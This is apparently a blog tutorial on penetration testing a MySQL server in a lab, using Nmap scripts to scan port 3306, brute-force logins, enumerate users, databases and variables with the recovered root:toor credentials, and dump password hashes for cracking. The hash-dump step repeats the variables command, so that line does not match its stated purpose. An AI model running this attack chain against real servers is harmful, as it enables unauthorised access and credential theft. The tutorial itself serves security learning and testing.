In this article we are discussing MYSQL penetration
testing using Nmap where you will learn how to retrieve database information
such as database name, table’s records, username, password and etc.
MySQL is an open Source for Relational Database Management System
that uses structured query language for generating database record.
Lets Begin !!!
Scanning for port 3306
open the terminal and type
following command to check mysql service is activated on targeted system or
not, basically mysql service is activated on default port 3306.
Nmap –sT 192.168.1.216
Retrieve mysql
information
Now
type another command to retrieve mysql information such as version, protocol
and etc:
Nmap –script=mysql-info
192.168.1.216
Above
command try to connect to with MySQL server and hence prints information such
as the protocol: 10, version numbers: 5.5.57
-0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt as shown in given below
image.
Brute force attack
This command will use dictionary for username and
password and then try to match the username and password combination by making
brute force attack against mysql.
Nmap –p 3306 –script
mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst
192.168.1.216
From given image you can observe that it found the valid
credential root: toor. This
credential will help in directly login into MYSQL server.
Retrieve mysql user names
This command will fetch mysql users name which help of
given argument mysqluser root and
mysqlpass toor.
Nmap –p 3306 –script=mysql-users
192.168.1.216 –script-args mysqluser=root,mysqlpass=toor
From given below image you can see we had found four user names: root,
debian-sys-maint, sr, st.
Retrieve database names
This command will fetch mysql database name which help of
given argument mysqluser root and
mysqlpass toor.
Nmap –p 3306 –script=mysql-databases
192.168.1.216 –script-args mysqluser=root,mysqlpass=toor
From given below image you can read the name of created
database such as ignite
This command will also perform same task as above but
retrieve database name using mysql query “show database”
Nmap –p 3306
192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”
From given below image you can read the name of created
database such as ignite
Retrieve mysql variable status ON/OFF
When
we want to pass a value from one SQL statement to another SQL statement, then we
store the value in a MySQL user-defined variable.
This command will fetch mysql variables name which help
of given argument mysqluser root and
mysqlpass toor.
Nmap –p 3306 –script=mysql-variables
192.168.1.216 –script-args mysqluser=root,mysqlpass=toor
From given image you can observe ON/OFF status for mysql
variable.
Retrieve Hash password
This command will Dumps
the password hashes from a MySQL server in a format suitable for cracking by
tools such as John the Ripper.
Nmap –p 3306 –script=mysql-variables
192.168.1.216 –script-args mysqluser=root,mysqlpass=toor
From given image you can observe that it has dumped the
hash value of passwords of respective user which we have enumerated above.
0 comments:
Post a Comment